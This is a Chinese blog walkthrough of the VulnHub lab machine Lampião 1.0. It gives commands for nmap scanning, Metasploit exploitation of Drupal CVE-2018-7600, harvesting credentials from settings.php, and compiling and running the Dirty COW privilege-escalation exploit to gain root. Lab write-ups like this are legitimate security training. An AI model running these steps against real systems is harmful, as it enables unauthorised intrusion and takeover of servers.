Lampião 1.0渗透测试

Vulnhub靶机系列:Lampião 1.0渗透测试

涉及知识

1.CVE-2018-7600
2.dirty cow提权

环境准备

靶机下载地址:Lampião: 1 ~ VulnHubKali Linux

image-20220818104943288

VMware打开.ovf文件

成功应如图

image-20220818105114816

渗透测试

获取目标机ip及端口

ip

扫描当前网段

nmap 192.168.30.0/24

image-20220818111757809

其中192.168.30.133可用

image-20220818111852711

扫描目标主机端口

nmap 192.168.30.133 -p-

image-20220818112504101

开放了一个1898端口

image-20220818112643069

扫描目录敏感文件

image-20220818113444365

发现/CHANGELOG.txt日志文件

在里面发现了网站使用的是drupal框架,同时版本更新到了 7.54

image-20220818113618191

那么就好办了,直接找Drupal7相关漏洞,找到Drupal核心远程代码执行漏洞

漏洞利用

利用msf直接打

image-20220818113954229

option设置

use 0
set rhost 192.168.30.133
set rport 1898
run

image-20220818114217701

获取到了一个普通用户权限

image-20220818114320884

ssh登陆连接

用户名

在/home目录下有个tiago文件夹,为其用户名

image-20220818115544103

还有一种方法,用python 启动终端,获取用户名,前提是目标vm必须有python 的编译环境

python -c 'import pty; pty.spawn("/bin/bash")'

image-20220818115942722

密码

/var/www/html/sites/default/settings.php

image-20220818121405327

尝试ssh登录,登陆成功

image-20220818121650089

但是这个账户是没有root权限的,所以下一步就是

脏牛提权

检查内核

uname -a

image-20220818132506218

可以看到我们的一个内核版本是4.4.0-31-generic,这个版本的内核是还存在脏牛漏洞的

利用linux-exploit-suggester进行提权cve漏洞检测

下载

git clone https://github.com/mzet-/linux-exploit-suggester

上传到目标机

upload linux-exploit-suggester /tmp

image-20220818131928604

利用

./linux-exploit-suggester.sh

image-20220818132249485

这里列出了很多有可能用于提权的cve,这里我们选择[CVE-2016-5195]dirty crow 40847

2

同样down下来上传到目标机

image-20220818133318135

c++ 格式文件,需要先编译

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o shell 40847.cpp -lutil

编译成功后会生成一个shell执行文件

执行dcow文件,这里还需注意需要先进入一个用户才能进行提权

./shell -s

成功提权

image-20220818140039611

改root账户密码

image-20220818135015356

ssh以root用户登录,拿到flag

image-20220818135055614

posted @ 2022-08-18 14:04  phant0m1  阅读(74)  评论(1编辑  收藏  举报